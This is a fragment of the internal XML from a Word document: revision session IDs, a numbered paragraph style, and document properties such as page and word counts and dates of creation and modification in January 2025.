    <w:rsid w:val="00056F3A"/>
    <w:rsid w:val="000E2B1A"/>
    <w:rsid w:val="000F2278"/>
    <w:rsid w:val="00107D1D"/>
    <w:rsid w:val="001317D3"/>
    <w:rsid w:val="001B252A"/>
    <w:rsid w:val="00273434"/>
    <w:rsid w:val="002C5874"/>
    <w:rsid w:val="002D5076"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="0031750D"/>
    <w:rsid w:val="003363E1"/>
    <w:rsid w:val="003A064C"/>
    <w:rsid w:val="004962D7"/>
    <w:rsid w:val="00501D4E"/>
    <w:rsid w:val="00524D77"/>
    <w:rsid w:val="005360D1"/>
    <w:rsid w:val="0055621C"/>
    <w:rsid w:val="00556EAA"/>
    <w:rsid w:val="00575A33"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005C733A"/>
    <w:rsid w:val="005C7FDD"/>
    <w:rsid w:val="005F56C8"/>
    <w:rsid w:val="00622D82"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="006630E4"/>
    <w:rsid w:val="006869F0"/>
    <w:rsid w:val="006B7F5D"/>
    <w:rsid w:val="006E2598"/>
    <w:rsid w:val="006E3C28"/>
    <w:rsid w:val="00717DEB"/>
    <w:rsid w:val="007254F9"/>
    <w:rsid w:val="00756444"/>
    <w:rsid w:val="007705F3"/>
    <w:rsid w:val="007733D6"/>
    <w:rsid w:val="00786FC3"/>
    <w:rsid w:val="007907EA"/>
    <w:rsid w:val="007A3901"/>
    <w:rsid w:val="007E4B65"/>
    <w:rsid w:val="008026B8"/>
    <w:rsid w:val="0080323A"/>
    <w:rsid w:val="0080336F"/>
    <w:rsid w:val="00817AEE"/>
    <w:rsid w:val="008A40C7"/>
    <w:rsid w:val="008C0EC9"/>
    <w:rsid w:val="008C2E95"/>
    <w:rsid w:val="00921B72"/>
    <w:rsid w:val="00925872"/>
    <w:rsid w:val="0093001D"/>
    <w:rsid w:val="00970483"/>
    <w:rsid w:val="00A82314"/>
    <w:rsid w:val="00AD5D83"/>
    <w:rsid w:val="00AF0643"/>
    <w:rsid w:val="00AF1151"/>
    <w:rsid w:val="00B14BE3"/>
    <w:rsid w:val="00B20559"/>
    <w:rsid w:val="00B241DD"/>
    <w:rsid w:val="00B35B42"/>
    <w:rsid w:val="00B41B26"/>
    <w:rsid w:val="00B62C3F"/>
    <w:rsid w:val="00B856F3"/>
    <w:rsid w:val="00BC0F0B"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BF65C9"/>
    <w:rsid w:val="00C042F2"/>
    <w:rsid w:val="00C4053D"/>
    <w:rsid w:val="00C766D0"/>
    <w:rsid w:val="00C81053"/>
    <w:rsid w:val="00C95A42"/>
    <w:rsid w:val="00CD0F47"/>
    <w:rsid w:val="00CD249F"/>
    <w:rsid w:val="00D069EF"/>
    <w:rsid w:val="00D85985"/>
    <w:rsid w:val="00E53EF2"/>
    <w:rsid w:val="00E574E3"/>
    <w:rsid w:val="00E902BC"/>
    <w:rsid w:val="00ED5725"/>
    <w:rsid w:val="00EE42C9"/>
    <w:rsid w:val="00F55E8C"/>
    <w:rsid w:val="00FC36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7F665BDC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4C0A73C7-9D55-9545-8A17-8A426C87C8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Style1">
    <w:name w:val="Style1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BD107F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="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13</Pages>
  <Words>529</Words>
  <Characters>3020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67</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-04T02:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-06T03:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>